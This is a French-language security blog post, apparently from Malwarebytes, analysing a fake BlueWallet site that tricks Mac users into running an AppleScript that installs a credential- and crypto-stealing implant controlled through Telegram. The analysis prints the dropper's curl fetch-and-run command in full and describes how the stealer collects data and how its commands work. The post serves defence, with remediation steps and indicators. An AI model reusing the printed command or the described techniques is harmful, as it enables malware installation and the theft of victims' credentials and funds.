Privacy, Arnaques, Informations sur les menaces

Une fausse application BlueWallet vole les mots de passe, les comptes et les cryptomonnaies sur les Mac

par Stefan Dasic | 1er juin 2026
Une fausse application BlueWallet vole les mots de passe, les comptes et les cryptomonnaies sur les Mac

Un faux site web se faisant passer pour BlueWallet (un véritable portefeuille Bitcoin) cible Mac à l'aide d'une attaque simple mais efficace. BlueWallet n'a pas été piraté. Les cybercriminels ont en réalité détourné le nom et l'image de marque de ce portefeuille Bitcoin légitime afin de donner une apparence de fiabilité à un téléchargement malveillant.

Si vous recherchiez un portefeuille de cryptomonnaies et que vous êtes tombé sur l'une de ces fausses pages de téléchargement de BlueWallet, le site a tenté de vous inciter à ouvrir un fichier téléchargé dans un outil intégré à macOS et à cliquer sur « Exécuter ». Si vous avez suivi ces instructions, le logiciel malveillant aurait pu voler vos mots de passe enregistrés, vos identifiants de connexion aux navigateurs, vos portefeuilles de cryptomonnaies, vos documents et d'autres données sensibles. Il surveille également le presse-papiers à la recherche d'adresses de portefeuilles de cryptomonnaies et peut les remplacer par des adresses contrôlées par les pirates.

Cette dernière fonctionnalité est particulièrement dangereuse. Si vous copiez l'adresse d'un portefeuille avant d'envoyer des fonds, le logiciel malveillant peut la remplacer discrètement par celle de l'attaquant. Tout semble normal à l'écran, mais l'argent est transféré ailleurs.

Faut-il s'inquiéter ? Seulement si vous avez téléchargé et exécuté le fichier. Le simple fait de consulter la page puis de la fermer n'a en soi aucune conséquence. L'attaque repose entièrement sur le fait que l'utilisateur ouvre le script et clique sur « Lecture ».

Si vous l'avez exécuté, considérez que votre ordinateur est compromis et suivez les étapes ci-dessous.

Que faire si vous pensez l'avoir exécuté ?

Si vous avez ouvert le fichier et cliqué sur « Lecture », partez du principe que votre appareil a été piraté et suivez les étapes suivantes :

  • Déconnectez la machine du réseau pour couper le canal de commande
  • Effectuez une analyse complète de l'appareil et assurez-vous d'utiliser un logiciel de sécurité à jour avec la protection Web activée
  • Depuis un autre appareil fiable, modifiez les mots de passe de tous les comptes utilisés sur le Mac, en commençant par ceux de votre messagerie électronique et de vos plateformes d'échange de cryptomonnaies
  • Transférez n'importe quelle cryptomonnaie vers un nouveau portefeuille créé sur un appareil vierge
  • Considérer les phrases de récupération et les clés existantes comme exposées
  • Avant d'envoyer des cryptomonnaies à l'avenir, vérifiez l'adresse de destination dans son intégralité, caractère par caractère
  • Recherchez et supprimez les fichiers inconnus dans ~/Library/LaunchAgents
  • Cherchez un élément caché .sysupd.sh fichier dans /tmp
  • Renouveler les identifiants Cloud et SSH si .ssh, .awsou .gnupg des fichiers se trouvaient sur la machine
  • En cas de doute, sauvegardez vos données et réinstallez macOS à partir d'une source fiable plutôt que d'essayer de le nettoyer sur place

Vous avez ramassé quelque chose que vous n'auriez pas dû ?

Astuces d'ingénierie sociale

Ce qui est le plus intéressant dans cette campagne, ce n'est pas l'aspect technique. Les pirates n'ont pas piraté le Mac contourné les mesures de sécurité d'Apple. Ils ont convaincu les victimes d'exécuter elles-mêmes le logiciel malveillant.

Le faux site web guide les utilisateurs tout au long du processus grâce à une page de téléchargement convaincante, des instructions simples et même un raccourci clavier. L'attaque aboutit parce que la victime se fie à ce qu'elle voit.

À mesure que les systèmes d'exploitation parviennent de mieux en mieux à bloquer les logiciels malveillants, les pirates informatiques misent de plus en plus sur l'ingénierie sociale. Plutôt que de chercher à contourner les mesures de sécurité, ils persuadent les utilisateurs de les franchir.

C'est pourquoi il est de plus en plus important d'adopter une habitude : méfiez-vous de tout fichier téléchargé qui vous invite à l'ouvrir dans un éditeur de scripts, un utilitaire de développement ou une fenêtre de Terminal, puis à cliquer sur « Exécuter ».

Dans le cadre de cette campagne, il suffisait d'appuyer une seule fois sur ⌘R pour transformer un Mac un outil permettant de voler des mots de passe, de dérober des portefeuilles de cryptomonnaies, de détourner le presse-papiers et d'accéder à distance à l'ordinateur.

Analyse technique

Première étape : le téléchargeur AppleScript

La page se trouve à l'adresse update-bluewallet[.]com, un nom de domaine suffisamment proche de celui du véritable portefeuille (bluewallet.io) d'y jeter un coup d'œil rapide. La première chose que fait la page, c'est de ne pas attendre le consentement. Son script lance une routine de téléchargement avec un délai de deux secondes dès le chargement de la page, puis à nouveau si le visiteur clique sur l'un des deux boutons.

Le fichier qui se trouve dans le dossier « Téléchargements » s'appelle BlueWallet Installer.applescript, une extension que la plupart des gens n'ont jamais vue et envers laquelle ils n'ont aucun réflexe de méfiance.

La page fait alors preuve d'une astuce discrète. Après un court délai, elle modifie son propre texte d'état pour qu'il ressemble à des instructions d'installation : « Ouvrez le programme d'installation, puis appuyez sur le bouton Lecture ou sur ⌘R ». Elle insère même un petit triangle bleu de lecture dans le texte afin que la formulation corresponde à l'interface réelle de l'éditeur de scripts que la victime s'apprête à voir.

Faux site web BlueWallet qui guide la victime tout au long du processus de téléchargement et d'exécution du script malveillant

La page guide la victime pas à pas à travers les étapes nécessaires pour exécuter le fichier.

Sur les versions récentes de macOS, une application non signée téléchargée sur Internet est mise en quarantaine et vérifiée avant de pouvoir s'exécuter. Un simple script ouvert dans l'Éditeur de scripts et exécuté par l'utilisateur contourne ce processus. L'utilisateur demande manuellement à un outil Apple de confiance d'exécuter du code ; il n'y a donc pas de contrôle de certification susceptible de bloquer l'opération.

C'est pourquoi l'attaquant a choisi un AppleScript plutôt qu'une application packagée : cela permet de faire passer la responsabilité de l'action risquée du système d'exploitation à la victime.

Le script AppleScript en lui-même est remarquablement court. Une fois débarrassé de ses commentaires superflus, notamment d'un faux numéro de version et d'une ligne prétendant s'agir d'une « mise à jour de l'installation de Brew », il exécute une seule commande shell encodée en base64, puis ordonne à Script Editor de se fermer sans enregistrer, effaçant ainsi toute trace de son passage.

Installation, mise à jour et mise à niveau de Brew

En gros, cette commande fait ce qui suit :

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Il récupère un deuxième script depuis un serveur distant, l'enregistre dans un fichier caché du répertoire temporaire, le rend exécutable, puis l'exécute en arrière-plan en masquant toute la sortie.

La victime ne voit rien. Le nom du fichier .sysupd.sh est déguisé en mise à jour du système. Il s'agit là d'un dropper en plusieurs étapes typique : la première étape est minuscule et jetable, et son seul rôle est de récupérer la véritable charge utile.

Deuxième étape : analyse de la charge utile

Les premières lignes décrivent le mode de fonctionnement du logiciel malveillant. Elles définissent umask 077 de sorte que tout ce qu'il crée n'est lisible que par l'utilisateur compromis, puis il crée un répertoire de travail caché, dont le nom est généré aléatoirement, sous /tmp provenant de /dev/urandom.

Sa configuration est dissimulée, mais de manière peu efficace. Une petite fonction nommée _xd parcourt une chaîne hexadécimale deux caractères à la fois et effectue une opération XOR sur chaque octet par rapport à une clé répétitive codée en dur : swckR9JCD2Uu.

Cette fonction décode, lors de l'exécution, le jeton du bot Telegram du script, l'identifiant de la conversation, le jeton de commande secondaire et l'URL de staging. Cela suffit pour déjouer les outils qui ne recherchent que des chaînes de caractères en clair, mais guère plus. Comme la clé et l'algorithme figurent tous deux dans le fichier, chaque valeur codée est entièrement récupérable.

Un détail retient particulièrement l'attention : la valeur du chat Telegram décodé et celle du chat de commande et de contrôle décodé sont identiques. L'attaquant utilise un seul canal Telegram à la fois comme point de chute pour l'exfiltration et comme canal de contrôle. Cette solution est peu coûteuse, évolutive, cryptée et se fond dans le trafic HTTPS ordinaire.

Tout n'est pas masqué. Les adresses utilisées pour le détournement du presse-papiers figurent en clair dans le fichier : une adresse Bitcoin, une adresse Ethereum et une adresse Solana. Ce sont ces adresses que le logiciel malveillant substitue lorsqu'il détecte que vous copiez l'adresse d'un portefeuille. Comme elles sont publiques sur leurs blockchains respectives, elles comptent également parmi les éléments les plus utiles de l'ensemble de l'échantillon.

Ce que le logiciel malveillant vole

Les procédures de collecte de la deuxième phase sont exhaustives. Elles s'articulent autour de six grandes catégories.

1. Navigateurs Web

Le script extrait l'historique, les cookies, les identifiants de connexion et les signets d'un large éventail de navigateurs, notamment :

  • Navigateurs basés sur Chromium : Google Chrome , Beta, Canary et Dev) ; Brave ; Microsoft Edge; Vivaldi ; Opera ; Opera GX ; Arc ; Chromium ; Coccoc ; et Yandex
  • Navigateurs basés sur Firefox : Firefox, Waterfox, Pale Moon, Zen et LibreWolf
  • Données natives du navigateur macOS : cookies, historique et valeurs des formulaires de Safari

2. Portefeuilles de cryptomonnaies

Cela semble être l'objectif principal du scénario.

Il concerne les applications de portefeuille de bureau, notamment Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop et Tonkeeper.

Elle vise également les portefeuilles sous forme d'extensions de navigateur dans plusieurs écosystèmes :

  • Bitcoin : Xverse , Leather, UniSat, Alby et Wizz
  • Solana : Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet et Slope
  • Portefeuilles EVM : MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin et XDEFI
  • Cosmos : Keplr , Station et Cosmostation
  • Autres écosystèmes : Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos et Temple

3. Gestionnaires de mots de passe et outils de sécurité

Ce logiciel malveillant cible le stockage local et les paramètres de plusieurs gestionnaires de mots de passe, notamment LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt et Buttercup.

Il recherche également les données associées à l'authentification à deux facteurs (2FA) et aux applications d'authentification, notamment Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS et FreeOTP.

4. Applications de communication et réseaux sociaux

Le script tente de copier les données de session et le stockage local de Telegram Desktop et Discord, y compris Discord Canary et Discord PTB.

5. Outils de développement et outils cloud

Il recherche les identifiants et les fichiers de configuration dans le répertoire personnel de l'utilisateur, notamment :

  • Configurations de l'AWS CLI dans .aws
  • Clés SSH dans .ssh
  • Clés GnuPG dans .gnupg
  • Configurations Kubernetes dans .kube
  • Fichiers Shell et Git, notamment .zshrc, .zsh_history, .bash_history, et .gitconfig

6. Applications de productivité et fichiers divers

Le script copie la base de données locale d'Apple Notes, NoteStore.sqlite.

Il recherche également les données des extensions de navigateur liées aux outils d'achat et de productivité, notamment Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist et Google Keep.

Enfin, il analyse les dossiers « Bureau », « Documents » et « Téléchargements » à la recherche de fichiers dont l'extension est, entre autres, .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, et .env, dans la limite d'une taille maximale.

Ce qu'il fait des données volées

Le logiciel malveillant tente de récupérer directement le mot de passe du compte de l'utilisateur. Un osascript La boîte de dialogue intitulée « Préférences Système » demande à l'utilisateur de saisir à nouveau son mot de passe « pour continuer ». Le script vérifie chaque tentative par rapport à dscl . authonly avant de l'enregistrer, de sorte qu'il ne s'arrête qu'une fois qu'il dispose d'un identifiant valide.

Pour l'exfiltration, il archive les données transférées à l'aide de l'outil intégré à macOS ditto, sans doute parce qu'il est toujours présent, contrairement à zip. Pour respecter la limite de 50 Mo imposée par Telegram pour les téléchargements, il divise les archives plus volumineuses en morceaux de 49 Mo avec split avant d'envoyer chaque pièce.

Il assure la persistance en enregistrant un fichier plist LaunchAgent dans le répertoire de l'utilisateur ~/Library/LaunchAgents, en s'appuyant sur un répertoire de support caché, et en le chargeant avec launchctl pour que l'implant se lance à chaque connexion.

Le « clipboard hijack » est une boucle en arrière-plan qui s'exécute en continu. A clip_watch La fonction surveille en permanence le presse-papiers, identifie les formats d'adresses Bitcoin, Ethereum et Solana à l'aide d'expressions régulières, transmet l'adresse d'origine au canal de commande et de contrôle, puis remplace le contenu du presse-papiers par l'adresse de l'attaquant via pbcopy.

Cela signifie que la substitution s'effectue en arrière-plan, entre le moment où l'on copie et celui où l'on colle.

Enfin, le logiciel malveillant peut être contrôlé de manière interactive. A c2_loop interroge le bot Telegram pour obtenir des commandes et prend en charge une suite complète d'outils pour les opérateurs :

  • /info pour plus d'informations sur le système
  • /exec pour des commandes shell arbitraires
  • /clipboard pour lire le contenu actuel du presse-papiers
  • /download pour extraire des fichiers spécifiques
  • /exfil pour relancer le module de gestion des vols
  • /selfdestruct pour effacer toute trace

Cela fait de la chaîne Telegram un canal de communication en temps réel permettant de contrôler à distance, et non plus un simple canal de diffusion à sens unique.

Vivre de la terre… et de Telegram

Le schéma est bien connu et de plus en plus courant : s'appuyer sur des outils qui ont déjà fait leurs preuves.

Le mécanisme d'injection exploite l'éditeur de script d'Apple. La configuration est dissimulée derrière un simple XOR plutôt que dans des binaires compressés. Le canal de commande utilise l'API Bot de Telegram, qui permet de contourner les filtres de sortie susceptibles de signaler un serveur inconnu.

Aucun de ces éléments n'est nouveau en soi. L'efficacité réside dans l'enchaînement d'éléments d'apparence légitime, de sorte qu'aucune étape ne déclenche d'alerte.

Possibilités de détection

Ce qui importe ici, ce n'est pas tant le leurre que la technique elle-même.

Éditeur de script exécutant un code Base64 d'une ligne do shell script un fichier qui se ferme immédiatement constitue un signal comportemental fort, et une cible de détection bien plus efficace que le fichier jetable de première étape. Il en va de même pour un fichier caché /tmp/.sysupd.sh téléchargé par curl et s'exécute en arrière-plan.

Les navigateurs et les interfaces de téléchargement pourraient traiter .applescript les fichiers provenant d'Internet sont traités avec la même méfiance que les fichiers exécutables. Et Telegram reste un canal de commande et de contrôle insuffisamment pris en compte, que le signalement des abus liés aux jetons de bot pourrait perturber à la source.

Indicateurs de compromission

Hachages de fichiers (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Indicateurs réseau

  • update-bluewallet[.]com
  • projects2026box[.]com

Adresses de détournement du presse-papiers

  • BTC : bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH : 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL : 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Nous ne nous contentons pas de signaler les menaces, nous les éliminons.

Les risques de cybersécurité ne devraient jamais se propager au-delà d'un titre. Éliminez les menaces de vos appareils en téléchargeant Malwarebytes dès aujourd'hui.

À propos de l'auteur

Stefan Dasic

Stefan Dasic

Passionné par les solutions antivirus, Stefan a été impliqué très tôt dans les tests de logiciels malveillants et l'assurance qualité des produits AV. Au sein de l'équipe Malwarebytes , Stefan se consacre à la protection des clients et à la garantie de leur sécurité.

DERNIERS ARTICLES

Actualités
semaine de la sécurité

Une semaine dans le domaine de la sécurité ( 25 mai 31 mai)

Juin 1, 2026

Liste des sujets que nous avons abordés au cours de la semaine du 25 au 31 mai 2026

Podcast
Un cadenas illustré est monté sur un pied de microphone et des ondes sonores sont émises par l'appareil.

Les applications de paiement surveillent ce que vous dites (Lock and Code, saison 7, épisode 11)

Mai 31, 2026

Cette semaine, dans le podcast « Lock and Code », nous discutons avec Rainey Reitman de la censure financière qui exclut les clients des principales applications de paiement.

Actualités
Logo Signal

Les utilisateurs de Signal visés par des attaques de phishing visant à dérober des sauvegardes

Mai 29, 2026

Des cybercriminels se font passer pour le service d'assistance de Signal afin de dérober les clés de restauration des sauvegardes, ce qui leur permet d'accéder à l'intégralité des archives de messages des victimes.

Articles connexes

Icône des contributeurs

Les contributeurs

Icône du centre des menaces

Centre des menaces

Icône Podcasts

Podcast

Icône de glossaire

Glossaire

Icône d'escroquerie

Escroqueries